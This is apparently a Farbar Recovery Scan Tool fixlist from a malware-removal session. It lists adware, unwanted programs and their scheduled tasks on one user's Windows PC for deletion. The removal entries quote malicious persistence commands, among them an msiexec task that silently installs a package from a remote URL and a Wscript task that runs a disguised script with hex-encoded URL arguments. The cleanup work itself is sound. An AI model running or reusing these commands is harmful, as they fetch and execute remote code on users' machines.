2017-02-20 02:39 - 2017-02-20 02:42 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2017-02-20 02:35 - 2017-02-20 02:35 - 00326144 _____ C:\ProgramData\smp2.exe
2017-02-20 02:35 - 2017-02-20 02:35 - 00000000 ____D C:\ProgramData\Voyasollams
2017-02-20 02:34 - 2017-02-20 07:34 - 00000000 ____D C:\ProgramData\Voyasollam
2017-02-20 02:34 - 2017-02-20 02:39 - 07319040 _____ C:\Users\shagu\AppData\Roaming\agent.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 00126464 _____ C:\Users\shagu\AppData\Roaming\noah.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 7319040 _____ () C:\Users\shagu\AppData\Roaming\agent.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 7319040 _____ () C:\Users\shagu\AppData\Roaming\agent.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 0126464 _____ () C:\Users\shagu\AppData\Roaming\noah.dat
2017-02-20 02:35 - 2017-02-20 02:35 - 0326144 _____ () C:\ProgramData\smp2.exe
C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe
C:\Program Files (x86)\gamesdesktop\DVWUF19X4UB11HX.exe
C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe
C:\ProgramData\smp2.exe
2017-02-20 03:21 - 2017-02-20 03:21 - 0065536 _____ (E76YALI) C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe
2017-02-20 03:30 - 2017-02-20 03:30 - 0065536 _____ (E76YALI) C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ATTENTION
Social2Search (HKLM\...\03735a5bef674249792b91c3a0317af8) (Version: 11.13.1.5 (i1.0) - Social2Search) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{3B955E2B-4C53-49DA-ABF9-8C884B5EA772}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{77034FCD-A5D0-4EA1-9C64-6D2ADDF608BD}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{7C766E42-DFB3-41C3-9650-7242B97517F9}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{84A0EA8D-1024-4FDC-94E5-EC620506B282}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{85B1E79A-BAB3-4929-8258-76F17D30ED66}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{8A88C0D4-73E0-46EE-BE7C-47B1266715AB}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{A75E8E41-9361-4847-B324-6FA4A06F77B2}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{CEF386D9-88A9-4BF6-A938-DAE5E9ED356B}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{DC58D809-847C-4A85-B5AB-0FA0266A58EF}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{FA348C94-E5B4-4B21-8092-025E6C38FEC8}) (Version: - ) <==== ATTENTION
Task: {07A5C145-140B-4602-A1FE-F178CE694315} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-02-20] () <==== ATTENTION
Task: {243B223D-6CD2-49FC-A5A9-454523D6DB38} - System32\Tasks\SMW_UpdateTask_Time_313835383239383434362d454a2a415034412a4a6c575a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {35213736-555C-4C95-A492-7668593AEE67} - System32\Tasks\x6H14o86G1 => C:\Program Files (x86)\y1V1qSd0Rl\updengine.exe [2017-02-18] () <==== ATTENTION
Task: {40A40C13-949A-4AC7-8B4F-578F438D4B28} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {4672810B-27B0-423D-9FA4-43E9FE9EF254} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-01-18] (Byte Technologies LLC) <==== ATTENTION
Task: {A3A85F43-42AF-4513-A8F3-5D832A863B93} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {A8953980-D5DC-4D58-A27E-6D81BF21E534} - System32\Tasks\Clogingfureried => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200BPVT-22JJ5T0_WD-WX11E61CJ760CJ760&v=2017220 /q
Task: {BDEE15FE-6942-4231-AE48-E8B202300A43} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-20] (UC Web Inc.) <==== ATTENTION
Task: {C487F802-0150-499A-9EEB-5152C7EB74DA} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-01-19] (Reimage®) <==== ATTENTION
Task: {CF040A84-D761-4118-8E6B-042FEC5B8B2B} - System32\Tasks\Yahoo! Powered latom => Wscript.exe "C:\ProgramData\{D39216F1-59D0-9C37-DF16-0275455489BB}\dade.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b44333932313646312d353944302d394333372d444631362d3032373534353534383942427d5c6d65736f6465" "433a5c50726f6772616d446174615c7b44333932313646312d353944302d394333372d444631 (l'élément de données a 78 caractères en plus).
Task: {DC99E15F-D13C-485C-8BA5-610BF83681C8} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-13] (Reimage ltd.) <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Yahoo! Powered latom.job => Wscript.exe C:\ProgramData\{D39216F1-59D0-9C37-DF16-0275455489BB}\dade.txt <==== ATTENTION
2017-02-20 03:04 - 2017-02-20 07:32 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2017-02-20 03:04 - 2017-02-20 03:04 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2017-02-20 02:33 - 2017-02-20 03:05 - 00043520 ____N () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2017-02-20 02:41 - 2017-02-15 12:14 - 00599440 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
2017-02-20 02:34 - 2017-02-20 02:32 - 00982016 _____ () C:\ProgramData\Voyasollam\Voyasollam.exe
2017-02-20 05:58 - 2017-02-20 05:58 - 00304456 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
2017-02-20 05:58 - 2017-02-20 05:58 - 00619848 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
2017-02-15 12:04 - 2017-02-15 12:04 - 01570304 _____ () C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
2016-12-22 21:30 - 2016-12-22 21:30 - 00563896 _____ () C:\Users\shagu\AppData\Roaming\cacaoweb\cacaoweb.exe
2017-02-20 02:41 - 2017-02-15 12:14 - 02149136 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
2017-02-20 02:40 - 2017-02-20 02:40 - 00219032 _____ () c:\program files\¿ìñ¹\x86\kuaizipupdatechecker.dll
2016-02-24 09:56 - 2015-12-14 07:05 - 00120832 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\QtSolutions_SOAP-2.7.dll
2016-02-24 09:56 - 2014-04-22 03:14 - 00065536 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\QHttpServer.dll
2016-02-24 09:56 - 2014-05-06 06:39 - 00861184 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\platforms\qwindows.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00021504 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qgif.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00020992 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qico.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00204800 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qjpeg.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00218112 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qmng.dll
2016-02-24 09:56 - 2014-05-06 06:58 - 00015872 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qsvg.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00015360 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qtga.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00307712 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qtiff.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00014848 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qwbmp.dll
2016-02-24 09:56 - 2014-05-06 07:31 - 00015872 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\sensors\qtsensors_dummy.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00036352 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\bearer\qgenericbearer.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00038912 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\bearer\qnativewifibearer.dll
AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [25444]
FirewallRules: [TCP Query User{C1E894D7-21F0-4995-B09A-4E942398BA39}C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe
FirewallRules: [UDP Query User{8E49E8D3-C733-4017-BED2-90250F09218C}C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe


EmptyTemp:
end
